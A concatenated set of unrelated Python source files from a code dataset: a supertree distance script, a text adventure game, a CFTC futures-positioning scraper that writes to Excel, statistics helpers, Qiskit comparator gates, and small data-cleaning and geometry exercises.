'__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"datadir\", help=\"directory where dataset is located\", type=str)\n\targs = parser.parse_args()\n\n\tmain(args.datadir)\n\n\t#([A-Za-z ]*\\.){1,3} ?(?=\\[Laughter\\])","sub_path":"clean_data_formats/full_text.py","file_name":"full_text.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"171958582","text":"#read in and set up \nread('../in_molluscs')\ninTrees = var.trees\nvar.trees = []\nMRP=func.readAndPop('mrpStrictConsTree.nex')\nMajR=func.readAndPop('mrpMajRuleConsTree.nex')\n#SR2008=func.readAndPop('SR2008_0_minprop0cons.nex')\nQPA=func.readAndPop('QPA_1_minprop50cons.nex')\nSPA=func.readAndPop('SPA_1_minprop50cons.nex')\nQPA.name='QPA'\nSPA.name='SPA'\nMRP.name='MRP'\nMajR.name='MajR'\na=func.readAndPop('SPA_1_minprop50cons.nex')\nQPA.taxNames=a.taxNames\nSPA.taxNames=a.taxNames\nMRP.taxNames=a.taxNames\nMajR.taxNames=a.taxNames\n\ntrees=[MRP, QPA,SPA]\n\n\ntt=Trees(trees=trees, taxNames=a.taxNames)\ntt.inputTreesToSuperTreeDistances(inTrees)\n\n#dm=tt.inputTreesToSuperTreeDistances(inTrees)\n\ndm = tt.topologyDistanceMatrix('scqdist')\ndm.writeNexus('qd_distances.nex')\n#paup execute rf_dist nj save\n\n\nfrom p4.supertreesupport import SuperTreeSupport\nprint(\"%20s %6s %6s %6s %6s %6s\" % (' ', 'S', 'P', 'Q', 'R', 'V'))\nfor st in trees:\n \n sts = SuperTreeSupport(st, inTrees)\n \n sts.doSaveDecoratedTree = False\n sts.decoratedFilename='mytree.nex'\n sts.doSaveIndexTree=False\n sts.indexFilename='mytreeIndex.nex'\n sts.csvFilename='mytreeIndex.csv'\n sts.doDrawTree=False\n sts.verbose=0\n \n sts.superTreeSupport()\n print(\"%20s %6.2f %6.2f %6.2f %6.2f %6.2f\" % (st.name, sts.S, sts.P, sts.Q, sts.R, sts.V))\n \n\n\n\n\n\n\n","sub_path":"MOLLUSK_FINAL/B_inputreesupertreedist.py","file_name":"B_inputreesupertreedist.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"455999831","text":"from room import Room\nfrom player import Player\nfrom item import Item, LightSource\nimport textwrap\n\n# Declare game-wide \"constants\"\nchar_line_limit = 90\n\n# Declare global functions\n\nwrapper = textwrap.TextWrapper(width=char_line_limit, replace_whitespace=False)\ndef print_wrap(foo):\n if isinstance(foo, str):\n print(wrapper.fill(text=foo))\n else:\n print(wrapper.fill( text=str(foo) ))\n\n# Declare all the rooms\n\nrooms = {\n 'outside': Room(\"Outside Cave Entrance\", \"North of you, the cave mount beckons\", True),\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty passages run north and east.\"\"\", True),\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling into the darkness. Ahead to the north, a light flickers in the distance, but there is no way across the chasm.\"\"\", False),\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west to north. The smell of gold permeates the air.\"\"\", False),\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure chamber! Sadly, it has already been completely emptied by earlier adventurers. The only exit is to the south.\"\"\", False)\n}\n\n# Link rooms together\n\nrooms['outside'].n_to = rooms['foyer']\nrooms['foyer'].s_to = rooms['outside']\nrooms['foyer'].n_to = rooms['overlook']\nrooms['foyer'].e_to = rooms['narrow']\nrooms['overlook'].s_to = rooms['foyer']\nrooms['narrow'].w_to = rooms['foyer']\nrooms['narrow'].n_to = rooms['treasure']\nrooms['treasure'].s_to = rooms['narrow']\n\n# Populate rooms with items\nrooms['foyer'].add_item(Item(\"Potion\", \"You can drink this to boost your health.\"))\nrooms['foyer'].add_item(Item(\"Coins\", \"These can be used to buy stuff.\"))\nrooms['foyer'].add_item(LightSource(\"Lamp\", \"This burns oil for light.\"))\nrooms['outside'].add_item(Item(\"Stick\", \"A very crude weapon.\"))\nrooms['narrow'].add_item(Item(\"Coin\", \"This can be used to buy stuff.\"))\nrooms['narrow'].add_item(Item(\"Coin\", \"This can be used to buy stuff.\"))\nrooms['narrow'].add_item(Item(\"Stick\", \"A very crude weapon.\"))\nrooms['narrow'].add_item(Item(\"Coin\", \"This can be used to buy stuff.\"))\nrooms['treasure'].add_item(Item(\"Rope\", \"Good for lots of things.\"))\n\n#\n# Main\n#\n\n# Make a new player object that is currently in the 'outside' room.\npc = Player( rooms['outside'] )\n\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\nmove_error = \"You can't move in that direction!\\n\"\ncommand = None\n\nprint('')\nwhile command != \"q\":\n\n # Move the player if they just entered a movement direction, or tell them they can't.\n if command == \"north\" or command == \"n\":\n if pc.room.n_to:\n pc.room = pc.room.n_to\n else:\n print(move_error)\n elif command == \"south\" or command == \"s\":\n if pc.room.s_to:\n pc.room = pc.room.s_to\n else:\n print(move_error)\n elif command == \"east\" or command == \"e\":\n if pc.room.e_to:\n pc.room = pc.room.e_to\n else:\n print(move_error)\n elif command == \"west\" or command == \"w\":\n if pc.room.w_to:\n pc.room = pc.room.w_to\n else:\n print(move_error)\n\n # View inventory\n elif command == \"i\" or command == \"inv\" or command == \"inventory\":\n print_wrap( pc.display_items() )\n print(\"\")\n\n # Parse more complex commands as multiple words\n elif command:\n complex_command = command.split(' ', 1)\n\n if len(complex_command) == 2:\n verb = complex_command[0]\n noun = complex_command[1]\n\n if verb == \"take\" or verb == \"get\":\n print(pc.take_item( noun.capitalize() ))\n if verb == \"drop\":\n print(pc.drop_item( noun.capitalize() ))\n\n else:\n print(\"Command not understood.\\n\")\n \n if pc.can_see():\n print_wrap( pc.room )\n print_wrap( pc.room.display_items() )\n else:\n print(\"It's pitch black!\")\n\n command = input(\"What do you want to do? \")\n print('')","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"426571805","text":"from bs4 import BeautifulSoup\nfrom xlrd import open_workbook\nfrom xlutils.copy import copy\n\nimport requests\nfrom openpyxl import load_workbook\nimport time\n\ndate=time.strftime(\"%m-%d-%y\")\n\nFILE = \"week89.xlsx\" # 2bd: better to rename as date\n\nINDIV_SHEETS = [\"CAD\", \"CHF\", \"GBP\", \"JPY\", \"EUR\", \"NZD\", \"USD\",\n \"AUD\", \"Nikkei\", \"Dow Jones\", \"Silver\", \"Gold\", \"Oil\"]\n\n# CHICAGO MERCANTILE EXCHANGE\nCURRENCIES = {\n \"CAD\" : 90741,\n \"CHF\" : 92741,\n \"GBP\" : 96742,\n \"YEN\" : 97741,\n \"EURO\" : 99741,\n \"NZD\" : 112741,\n \"AUD\" : 232741,\n \"Nikkei\" : 240741\n}\n\n# Chicago Board of Traders\nTRADES = {\n \"DJ\": 124603\n}\n\n# CHICAGO BOARD OF COMMODITIES\nCOMMODITIES = {\n \"SILVER\" : 84691,\n \"GOLD\" : 88691\n}\n\nICE ={\n \"USD\": 98662\n}\n\nNYME ={\n \"OIL\": 67651\n}\n\n\ndef get_row_count(sheet):\n \"\"\" Find next row to append in INDIV_SHEETS. number of\n non-null values in col C is used to update the next row. \"\"\"\n #some impropvement is to ensure doesnt double run\n count = 2 # cell value count starts at 2\n\n for cell in sheet['C']:\n if cell.value != None:\n count += 1\n return count\n\ndef update_each_sheet_NONCOMM(sheet, sheet_name, nc_long, nc_short, nc_long_week, nc_short_week, oi):\n \"\"\"Update up each sheet with NON-COMMERCIAL data\"\"\"\n row_count = get_row_count(sheet)\n\n list1_nc = [\"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"M\", \"N\", \"O\"]\n list2_nc = [\"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"L\", \"M\", \"N\"]\n\n column = {\"CAD\": list1_nc, \"CHF\": list1_nc, \"GBP\":list2_nc, \"JPY\":list2_nc, \"EUR\":list1_nc, \"NZD\":list2_nc, \"AUD\":list2_nc,\n \"Nikkei\":list2_nc, \"USD\":list1_nc, \"Dow Jones\":list2_nc, \"Silver\":list2_nc, \"Gold\":list2_nc, \"Oil\":list2_nc}\n\n # Select cells for updates, all strings\n cell1 = column[sheet_name][0]+str(row_count) #nc_long\n cell2 = column[sheet_name][1]+str(row_count) #nc_short\n cell3 = column[sheet_name][2]+str(row_count) #OI\n cell4 = column[sheet_name][3]+str(row_count) #long week\n cell5 = column[sheet_name][4]+str(row_count) #short week\n cell6 = column[sheet_name][5]+str(row_count) #real\n cell7 = column[sheet_name][6]+str(row_count) #net\n cell8 = column[sheet_name][7] + str(row_count) # ratio\n cell9 = column[sheet_name][8] + str(row_count) # % OI in long\n cell10 = column[sheet_name][9] + str(row_count) # % OI in short\n cell11 = column[sheet_name][10] + str(row_count) # %OI in net\n prev_net_cell = column[sheet_name][6]+str(row_count-1) # net previous row retrieved for value of net\n\n sheet[cell1] = nc_long\n sheet[cell2] = nc_short\n sheet[cell3] = oi\n sheet[cell4] = nc_long_week\n sheet[cell5] = nc_short_week\n\n real_pos_val = int(nc_long_week.replace(\",\", \"\")) - int(nc_short_week.replace(\",\", \"\"))\n sheet[cell6] = real_pos_val# real position\n\n # Net is previous net + current real pos\n net = sheet[prev_net_cell].value + real_pos_val\n sheet[cell7] = net\n # Ratio is %OI long (long divide by OI)/% OI short (short divide by OI)\n\n # bigger over small. -ve is short > long\n # if short > long, -ve and short over long\n float_nclong = float(nc_long.replace(\",\", \"\"))\n float_ncshort = float(nc_short.replace(\",\", \"\"))\n\n\n if float_nclong >= float_ncshort:\n ratio = float_nclong / float_ncshort\n else:\n ratio = (float_ncshort/ float_nclong)*-1\n\n sheet[cell8] = str('%.2f' % ratio)\n\n sheet[cell9] = str('%.2f' % (float_nclong/float(oi.replace(\",\", \"\"))*100)) + \"%\"\n sheet[cell10] = str('%.2f' % (float_ncshort/float(oi.replace(\",\", \"\"))*100)) + \"%\"\n sheet[cell11] = str('%.2f' %( net*100/float(oi.replace(\",\", \"\")))) + \"%\"\n return\n\ndef update_each_sheet_COMM(sheet, sheet_name, c_long, c_short, c_long_week, c_short_week, oi):\n \"\"\"Update up each individual sheet with COMMERCIAL data\"\"\"\n\n row_count = get_row_count(sheet) -1 # MINUS 1 because after updating non commm the row count returns the ROW\n #after the nonComm just updated\n\n\n #c_long, c_short, OI, long week, short week, real, net, ratio, % oi in long, % OI in shorts, %OI in net\n list1_c = [\"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"AC\", \"AD\", \"AE\"]\n list2_c = [\"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"AA\", \"AD\", \"AE\", \"AF\"]\n\n column = {\"CAD\": list2_c, \"CHF\": list2_c, \"GBP\":list1_c, \"JPY\":list1_c, \"EUR\":list2_c, \"NZD\":list1_c, \"AUD\":list1_c,\n \"Nikkei\":list1_c, \"USD\":list2_c, \"Dow Jones\":list1_c, \"Silver\":list1_c, \"Gold\":list1_c, \"Oil\":list1_c}\n\n\n # Select cells for updates, all strings\n cell1 = column[sheet_name][0]+str(row_count) #c_long\n cell2 = column[sheet_name][1]+str(row_count) #c_short\n cell3 = column[sheet_name][2]+str(row_count) #OI\n cell4 = column[sheet_name][3]+str(row_count) #long week\n cell5 = column[sheet_name][4]+str(row_count) #short week\n cell6 = column[sheet_name][5]+str(row_count) #real\n cell7 = column[sheet_name][6]+str(row_count) #net\n cell8 = column[sheet_name][7] + str(row_count) # ratio\n cell9 = column[sheet_name][8] + str(row_count) # % OI in long\n cell10 = column[sheet_name][9] + str(row_count) # % OI in short\n cell11 = column[sheet_name][10] + str(row_count) # %OI in net\n prev_net_cell = column[sheet_name][6]+str(row_count-1) # net previous row retrieved for value of net\n\n sheet[cell1] = c_long\n sheet[cell2] = c_short\n sheet[cell3] = oi\n\n sheet[cell4] = c_long_week\n sheet[cell5] = c_short_week\n\n real_pos_val = int(c_long_week.replace(\",\", \"\")) - int(c_short_week.replace(\",\", \"\"))\n sheet[cell6] = real_pos_val# real position\n\n # Net is previous net + current real pos\n net = sheet[prev_net_cell].value + real_pos_val\n sheet[cell7] = net\n # Ratio is %OI long (long divide by OI)/% OI short (short divide by OI)\n\n # bigger over small. -ve is short > long\n # if short > long, -ve and short over long\n float_clong = float(c_long.replace(\",\", \"\"))\n float_cshort = float(c_short.replace(\",\", \"\"))\n\n if float_clong >= float_cshort:\n ratio = float_clong / float_cshort\n else:\n ratio = (float_cshort/ float_clong)*-1\n sheet[cell8] = '%.2f' % ratio\n sheet[cell9] = str('%.2f' % (float_clong/float(oi.replace(\",\", \"\"))*100)) + \"%\"\n sheet[cell10] = str('%.2f' % (float_cshort/float(oi.replace(\",\", \"\"))*100)) + \"%\"\n\n sheet[cell11] = str('%.2f' % (net*100/float(oi.replace(\",\", \"\")))) + \"%\"\n\n return\n\ndef update_dates(wb,date_string): #manually pass as arg\n \"\"\" Update date cells for all sheets \"\"\"\n columns = {\"CAD\": [\"B\", \"S\"], \"CHF\": [\"B\", \"S\"], \"GBP\":[\"A\", \"R\"], \"JPY\":[\"A\", \"R\"], \"EUR\":[\"B\", \"S\"], \"NZD\":[\"A\", \"R\"], \"AUD\":[\"A\", \"R\"],\n \"Nikkei\":[\"A\", \"R\"], \"USD\":[\"B\", \"S\"], \"Dow Jones\":[\"A\", \"R\"], \"Silver\":[\"A\", \"R\"], \"Gold\":[\"A\", \"R\"], \"Oil\":[\"A\", \"R\"]\n }\n\n wb['Main']['A1'] = date_string\n for sheet_name, col in columns.items():\n cell_nc = col[0] + str(get_row_count(wb[sheet_name])-1)\n wb[sheet_name][cell_nc] = date_string\n cell_c = col[1] + str(get_row_count(wb[sheet_name]) - 1)\n print(cell_c)\n wb[sheet_name][cell_c] = date_string\n\n\n return\n\n\ndef update_all_sheets(wb ,curr_dict):\n \"\"\" Calls functions to update each individual sheet with NON-COMM and COMM data \"\"\"\n for sheet_name in INDIV_SHEETS:\n\n dict_value = {\n \"CAD\":\"CAD\", \"CHF\":\"CHF\", \"GBP\":\"GBP\", \"JPY\":\"YEN\", \"EUR\":\"EURO\", \"NZD\":\"NZD\", \"AUD\":\"AUD\",\n \"Nikkei\":\"Nikkei\", \"USD\":\"USD\", \"Dow Jones\":\"DJ\", \"Silver\":\"SILVER\", \"Gold\":\"GOLD\", \"Oil\":\"OIL\" \n }# matches sheet_name to dict_name\n\n params=curr_dict[dict_value[sheet_name]]\n\n #sheet, sheet_name, nc_long, nc_short, nc_long_week, nc_short_week, oi)\n # ### CURR DICT KEY MIGHT NOT BESAME AS SHEETNAME\n # params => [nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week ]\n\n update_each_sheet_NONCOMM(wb[sheet_name], sheet_name,params[0],params[1], params[5], params[6], params[4])\n #(sheet, sheet_name, c_long, c_short, c_long_week, c_short_week, oi\n\n update_each_sheet_COMM(wb[sheet_name], sheet_name,params[2],params[3], params[7], params[8], params[4])\n return\n\n\ndef get_dets(CAD, s): #2bd: CAD is a bad var name\n \"\"\" Parse HTML to retrieve data \"\"\"\n try:\n row_all = s.split(str(CAD))[1].split('Changes')[0].split('All')[1].split('Old')[0].replace(\":\", \"\")\n integers = row_all.split()\n oi = integers[0]\n nc_long = integers[1]\n nc_short = integers[2]\n c_long = integers[4]\n c_short = integers[5]\n this_week_row = s.split(str(CAD))[1].split('Changes')[1].split('Percent')[0].split(':')[4]\n integers2 = this_week_row.split()\n\n nc_long_week =integers2[0]\n nc_short_week =integers2[1]\n\n\n if len(integers2)== 7:\n c_long_week = integers2[3]\n c_short_week =integers2[4]\n else:\n raise\n return nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week\n except Exception as e:\n print(\"ERROR\")\n print(e)\n raise\n\n\ndef get_html(link):\n \"\"\" GET request to URL and returns text in HTML \"\"\"\n\n r = requests.get(link)\n soup = BeautifulSoup(r.content)\n data=soup.findAll('pre')\n return data[0].text\n\n\n\ndef main_sheet():\n \"\"\"\n Retrieves data from respective URLs and returns curr_dict which contains\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week\n for each item in CURRENCIES, TRADES, COMMODOTIES, ICE, NYME\n \"\"\"\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deacmelf.htm')\n curr_dict = {}\n for c, val in CURRENCIES.items():\n\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deacbtlf.htm')\n for c, val in TRADES.items():\n\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [ nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deacmxlf.htm')\n for c, val in COMMODITIES.items():\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [nc_long, nc_short, c_long, c_short,oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deanybtlf.htm')\n for c, val in ICE.items():\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [nc_long, nc_short, c_long, c_short,oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n\n data_string = get_html('http://www.cftc.gov/dea/futures/deanymelf.htm')\n for c, val in NYME.items():\n nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week = get_dets(val, data_string)\n curr_dict[c] = [nc_long, nc_short, c_long, c_short, oi, nc_long_week, nc_short_week, c_long_week, c_short_week ]\n print(curr_dict)\n return curr_dict\n\n\n\ndef insert_excel(curr_dict, date_string):\n \"\"\"\n Insert retrieved data in ALL SHEETS\n Saves File\n \"\"\"\n\n wb = load_workbook(filename=FILE)\n Main = wb['Main']\n\n #update main sheet\n #CANADA\n Main['D3'], Main['E3'], Main['H3'], Main['I3'], Main['L3'] = curr_dict[\"CAD\"][0], curr_dict[\"CAD\"][1], curr_dict[\"CAD\"][2], curr_dict[\"CAD\"][3], curr_dict[\"CAD\"][4]\n #update_each_sheet( wb['CHF'], curr_dict[\"CAD\"][0], curr_dict[\"CAD\"][1], curr_dict[\"CAD\"][2], curr_dict[\"CAD\"][3], curr_dict[\"CAD\"][4])\n #CHF\n\n Main['D4'], Main['E4'], Main['H4'], Main['I4'], Main['L4'] = curr_dict[\"CHF\"][0], curr_dict[\"CHF\"][1], curr_dict[\"CHF\"][2], curr_dict[\"CHF\"][3], curr_dict[\"CHF\"][4]\n #GBP\n Main['D5'], Main['E5'], Main['H5'], Main['I5'], Main['L5'] = curr_dict[\"GBP\"][0], curr_dict[\"GBP\"][1], curr_dict[\"GBP\"][2], curr_dict[\"GBP\"][3], curr_dict[\"GBP\"][4]\n #YEN\n Main['D6'], Main['E6'], Main['H6'], Main['I6'], Main['L6'] = curr_dict[\"YEN\"][0], curr_dict[\"YEN\"][1], curr_dict[\"YEN\"][2], curr_dict[\"YEN\"][3], curr_dict[\"YEN\"][4]\n #EURO\n Main['D7'], Main['E7'], Main['H7'], Main['I7'], Main['L7'] = curr_dict[\"EURO\"][0], curr_dict[\"EURO\"][1], curr_dict[\"EURO\"][2], curr_dict[\"EURO\"][3], curr_dict[\"EURO\"][4]\n #NZD\n Main['D8'], Main['E8'], Main['H8'], Main['I8'], Main['L8'] = curr_dict[\"NZD\"][0], curr_dict[\"NZD\"][1], curr_dict[\"NZD\"][2], curr_dict[\"NZD\"][3], curr_dict[\"NZD\"][4]\n #AUD\n Main['D9'], Main['E9'], Main['H9'], Main['I9'], Main['L9'] = curr_dict[\"AUD\"][0], curr_dict[\"AUD\"][1], curr_dict[\"AUD\"][2], curr_dict[\"AUD\"][3], curr_dict[\"AUD\"][4]\n #Nikkei\n Main['D10'], Main['E10'], Main['H10'], Main['I10'], Main['L10'] = curr_dict[\"Nikkei\"][0], curr_dict[\"Nikkei\"][1], curr_dict[\"Nikkei\"][2], curr_dict[\"Nikkei\"][3], curr_dict[\"Nikkei\"][4]\n #DJ\n Main['D11'], Main['E11'], Main['H11'], Main['I11'], Main['L11'] = curr_dict[\"DJ\"][0], curr_dict[\"DJ\"][1], curr_dict[\"DJ\"][2], curr_dict[\"DJ\"][3], curr_dict[\"DJ\"][4]\n #SILVER\n Main['D12'], Main['E12'], Main['H12'], Main['I12'], Main['L12'] = curr_dict[\"SILVER\"][0], curr_dict[\"SILVER\"][1], curr_dict[\"SILVER\"][2], curr_dict[\"SILVER\"][3], curr_dict[\"SILVER\"][4]\n #GOLD\n Main['D13'], Main['E13'], Main['H13'], Main['I13'], Main['L13'] = curr_dict[\"GOLD\"][0], curr_dict[\"GOLD\"][1], curr_dict[\"GOLD\"][2], curr_dict[\"GOLD\"][3], curr_dict[\"GOLD\"][4]\n #OIL\n Main['D14'], Main['E14'], Main['H14'], Main['I14'], Main['L14'] = curr_dict[\"OIL\"][0], curr_dict[\"OIL\"][1], curr_dict[\"OIL\"][2], curr_dict[\"OIL\"][3], curr_dict[\"OIL\"][4]\n\n #USD\n Main['D15'], Main['E15'], Main['H15'], Main['I15'], Main['L15'] = curr_dict[\"USD\"][0], curr_dict[\"USD\"][1], curr_dict[\"USD\"][2], curr_dict[\"USD\"][3], curr_dict[\"USD\"][4]\n\n # Update the other sheets\n update_all_sheets(wb, curr_dict)\n\n\n update_dates(wb, date)\n\n #only save when error free\n wb.save(FILE)\n\n return\n\nif __name__ == \"__main__\":\n curr_dict=main_sheet()\n insert_excel(curr_dict, date)\n\n\n\n\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":14464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"205010671","text":"from collections import Counter\nfrom typing import Any, Dict, Optional, Tuple\n\n\nMin = float\nMax = float\nAvg = float\nDistribution = Dict[Any, int]\nRange = str\n\n\ndef to_range(percentage: float, step: int) -> Range:\n lower = (int(percentage * 100) // step) * step\n upper = min(lower + step, 100)\n return f\"{lower} - {upper}\"\n\n\ndef extract_first_number_from_range(range_: str) -> int:\n return [int(s) for s in range_.split() if s.isdigit()][0]\n\n\ndef average_from_distribution(distribution) -> float:\n return sum(int(number) * frequency\n for number, frequency\n in distribution.items()) / \\\n sum(frequency\n for frequency\n in distribution.values())\n\n\ndef max_from_distribution(distribution) -> float:\n return max(int(number)\n for number\n in distribution.keys())\n\n\ndef min_from_distribution(distribution: Distribution) -> float:\n return min(int(number)\n for number\n in distribution.keys())\n\n\nStats = Tuple[Distribution, Optional[Tuple[Avg, Max, Min]]]\n\n\ndef stats_from_counter(counter: Counter) -> Stats:\n\n distribution = {\n score: count\n for score, count in counter.most_common()\n }\n\n if len(counter) > 0:\n\n first = counter.most_common()[0][0]\n\n if(isinstance(first, int)):\n max = max_from_distribution(distribution)\n min = min_from_distribution(distribution)\n avg = average_from_distribution(distribution)\n return distribution, (avg, max, min)\n\n return distribution, None\n","sub_path":"interference/util/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"29414748","text":"from itertools import chain\n\nfrom qiskit import QuantumRegister, QuantumCircuit\nfrom qiskit.circuit import Gate\n\nfrom gates.beauregard.constant_adder import as_bits_reversed\n\n\ndef double_controlled_comparator(constant: int, n: int) -> Gate:\n ctrl_qreg = QuantumRegister(2, name='ctrl')\n x_qreg = QuantumRegister(n, name='x')\n g_qreg = QuantumRegister(n - 1 if n >= 2 else 1, name='g')\n c_qreg = QuantumRegister(1, name='c')\n\n circuit = QuantumCircuit(ctrl_qreg,\n x_qreg,\n g_qreg,\n c_qreg,\n name=f'CC-CMP_({constant})')\n\n cccx = _triple_controlled_not()\n cccx_qubits = list(chain(ctrl_qreg, x_qreg, c_qreg, g_qreg)) if n == 1 \\\n else list(chain(ctrl_qreg, [g_qreg[n - 2]], c_qreg, [x_qreg[0]]))\n\n circuit.x(x_qreg)\n\n if n == 1:\n if constant == 1:\n circuit.append(cccx, cccx_qubits)\n else:\n body = _carry_body(constant, n, x_qreg, g_qreg)\n body_qubits = list(chain(x_qreg, g_qreg))\n\n circuit.append(cccx, cccx_qubits)\n circuit.append(body, body_qubits)\n circuit.append(cccx, cccx_qubits)\n circuit.append(body.inverse(), body_qubits)\n\n circuit.x(x_qreg)\n\n return circuit.to_gate()\n\n\ndef _carry_body(constant: int, n: int, x_qreg: QuantumRegister, g_qreg: QuantumRegister) -> Gate:\n constant_bits = as_bits_reversed(constant, n)\n circuit = QuantumCircuit(x_qreg, g_qreg)\n\n for i in reversed(range(2, n)):\n if constant_bits[i] == '1':\n circuit.x(x_qreg[i])\n circuit.ccx(g_qreg[i - 2], x_qreg[i], g_qreg[i - 1])\n if constant_bits[i] == '1':\n circuit.x(x_qreg[i])\n\n if constant_bits[1] == '1':\n circuit.cx(x_qreg[1], g_qreg[0])\n circuit.x(x_qreg[1])\n\n if constant_bits[0] == '1':\n circuit.ccx(x_qreg[0], x_qreg[1], g_qreg[0])\n\n for i in range(2, n):\n if constant_bits[i] == '1':\n circuit.cx(x_qreg[i], g_qreg[i - 1])\n circuit.x(x_qreg[i])\n circuit.ccx(g_qreg[i - 2], x_qreg[i], g_qreg[i - 1])\n\n return circuit.to_gate()\n\n\ndef _triple_controlled_not() -> Gate:\n ctrl_qreg = QuantumRegister(3, name='ctrl')\n x_qreg = QuantumRegister(1, name='x')\n g_qreg = QuantumRegister(1, name='g')\n\n circuit = QuantumCircuit(ctrl_qreg,\n x_qreg,\n g_qreg,\n name='CCCX')\n\n for _ in range(2):\n circuit.ccx(ctrl_qreg[2], g_qreg[0], x_qreg[0])\n circuit.ccx(ctrl_qreg[0], ctrl_qreg[1], g_qreg[0])\n\n return circuit.to_gate()\n","sub_path":"gates/takahashi/comparator.py","file_name":"comparator.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"569484379","text":"import math\n\nn = int(input())\ndef gum():\n d = math.sqrt((x2-x1)**2 + (y2-y1)**2)\n \n #원 좌표가 같을 떄 \n if(d==0):\n if(r1==r2):\n print(-1)\n \n if(r1!=r2):\n print(0)\n \n #원 좌표가 다를 떄 \n else:\n if(d == r1+r2 or d == abs(r2-r1)):\n print(1)\n elif(abs(r2-r1) < d < r2+r1):\n print(2)\n else:\n print(0)\n\n\nfor i in range(n):\n x1, y1, r1, x2, y2, r2 = map(int, input().split())\n gum()\n\n\n\n","sub_path":"python_study/Baekjoon/0729_1002.py","file_name":"0729_1002.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"462297807","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\ndef BoundaryFilter(Positions, Gridsize, Boundary):\r\n \"\"\" This function returns two lists of x-y particle coordinates for\r\n particles that were more than the Boundary value (in nanometers, Bvalue\r\n defined below converts to Ångstrøm) from the edge of the grid. The\r\n \"Positions\" parameter is a 2D array of x-y particle positions and the\r\n gridsize is the sidelength of the simulation grid.\"\"\"\r\n\r\n \"\"\"Creating empty lists for appending later\"\"\"\r\n dim1 =[]\r\n dim2 =[]\r\n \"\"\"Converting the desired boundary value from nanometers to Ångstrøm\"\"\"\r\n Bvalue = Boundary*10\r\n\r\n \"\"\"Loop through each position and determine if it is filtered or not.\"\"\"\r\n for i, a in enumerate(Positions[0]):\r\n if Positions[0][i]>Bvalue and Positions[0][i]Bvalue and Positions[1][i] 00:00\n# ex2) 미개방 -> nan\nfor cols in park.keys():\n if '개방' in cols:\n for i in park.index:\n try:\n len(park[cols][i])\n except:\n 1\n else:\n if len(park[cols][i]) == 4 and ':00' in park[cols][i]:\n park[cols][i] = '0' + park[cols][i]\n elif '24:00' in park[cols][i]:\n park[cols][i] = '24:00'\n print(\"num!\", i)\n\n# 개방시작시간, 개방종료시간 combine\n# 14일 00:00, 24:00 -> 14,00:00~24:00\n# day_flag(개방시작시간) == 0\n# day_flag(개방종료시간) == 1\nday_flag = 0\nfor cols in park.keys():\n # 개방시작시간 읽으면서 종료시간까지 읽고 combine하여 새로운 column 생성\n if '개방' in cols and day_flag == 0:\n day_flag = 1\n days, tmp = cols.split(', ')\n year, month, day_week = days.split('.')\n new_cols = month+'.'+day_week\n day, week = day_week.split('(')\n \n park[new_cols] = day + ',' + park[cols] + '~' + park[days+', 개방종료시간']\n park.rename(columns={cols:days}, inplace=True)\n \n elif day_flag == 1:\n day_flag = 0\n\n# 기존의 날짜 column 삭제\nfor cols in park.keys():\n if \"18\" in cols or 'Unnamed' in cols:\n del park[cols]\n\n# 위도가 비어있는 부분을 찾아 print하여 확인하는 작업\n# print를 이제 dict에서 x, y에 저장해야 